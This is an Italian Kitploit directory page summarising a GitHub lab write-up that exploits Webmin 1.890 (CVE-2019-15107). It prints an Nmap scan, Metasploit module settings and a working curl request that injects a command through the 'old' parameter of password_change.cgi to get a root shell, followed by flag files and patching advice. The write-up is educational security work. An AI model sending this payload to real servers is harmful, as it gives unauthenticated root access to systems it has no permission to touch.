Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Project-Exploitation-of-Webmin-Authentication-Vulnerability — Obiettivo della ricerca: condurre un'analisi completa e lo sfruttamento riuscito di una vulnerabilità di Remote Code Execution (RCE) in Webmin versione 1.890 (CVE-2019-15107), ottenendo infine il pieno controllo del sistema target. | Kitploit
Strumenti/GitHubGitHub/artemcyberlab/project-exploitation-of-webmin-authentication-vulnerability
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubartemcyberlab/project-exploitation-of-webmin-authentication-vulnerability

Project-Exploitation-of-Webmin-Authentication-Vulnerability

Obiettivo della ricerca: condurre un'analisi completa e lo sfruttamento riuscito di una vulnerabilità di Remote Code Execution (RCE) in Webmin versione 1.890 (CVE-2019-15107), ottenendo infine il pieno controllo del sistema target.

Vedi Repository
31 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Obiettivo della ricerca: Condurre un'analisi completa e lo sfruttamento riuscito di una vulnerabilità di Remote Code Execution (RCE) in Webmin versione 1.890 (CVE-2019-15107), ottenendo infine il pieno controllo del sistema target.

Metodologia:

Ricognizione iniziale:

Scansione di rete eseguita con Nmap:

bash nmap -sV -sC -A -p- 10.201.105.185 Identificato il servizio Webmin 1.890 in esecuzione sulla porta 10000

Analisi della vulnerabilità:

Investigato il meccanismo della vulnerabilità in password_change.cgi

Confermata la possibilità di esecuzione arbitraria di comandi senza autenticazione

Sfruttamento:

Implementati due vettori d'attacco:

Utilizzando Metasploit Framework:

bash use exploit/linux/http/webmin_backdoor set RHOSTS 10.201.105.185 set LHOST tun0 exploit Sfruttamento manuale tramite curl:

bash curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test" Post-sfruttamento:

Ottenuta una shell root interattiva

Condotta l'analisi del filesystem

Trovati i file flag:

bash /home/dark/user.txt /root/root.txt Risultati:

Sfruttata con successo la vulnerabilità CVE-2019-15107

Ottenuti privilegi root completi sul sistema

Dimostrata l'importanza critica degli aggiornamenti software tempestivi

Conclusioni tecniche:

La vulnerabilità permette l'esecuzione arbitraria di comandi tramite l'iniezione del parametro 'old'

La mancanza di controlli di autenticazione lo rende particolarmente pericoloso

La versione 1.890 contiene una backdoor corretta nelle versioni successive

Raccomandazioni di sicurezza:

Aggiornamento immediato alla versione corrente di Webmin

Limitare l'accesso al pannello di amministrazione per IP

Audit di sicurezza regolari delle applicazioni web

Direzioni di ricerca future:

Analisi di altre vulnerabilità di Webmin

Sviluppo di exploit personalizzato senza Metasploit

Investigazione di tecniche di persistenza in sistemi compromessi

Questo caso di studio dimostra l'importanza critica degli aggiornamenti tempestivi del sistema e la necessità di un monitoraggio continuo delle vulnerabilità nel software distribuito. La ricerca fornisce approfondimenti pratici sulle moderne tecniche di sfruttamento delle applicazioni web, sottolineando al contempo i principi fondamentali di sicurezza.

Scarica lo strumento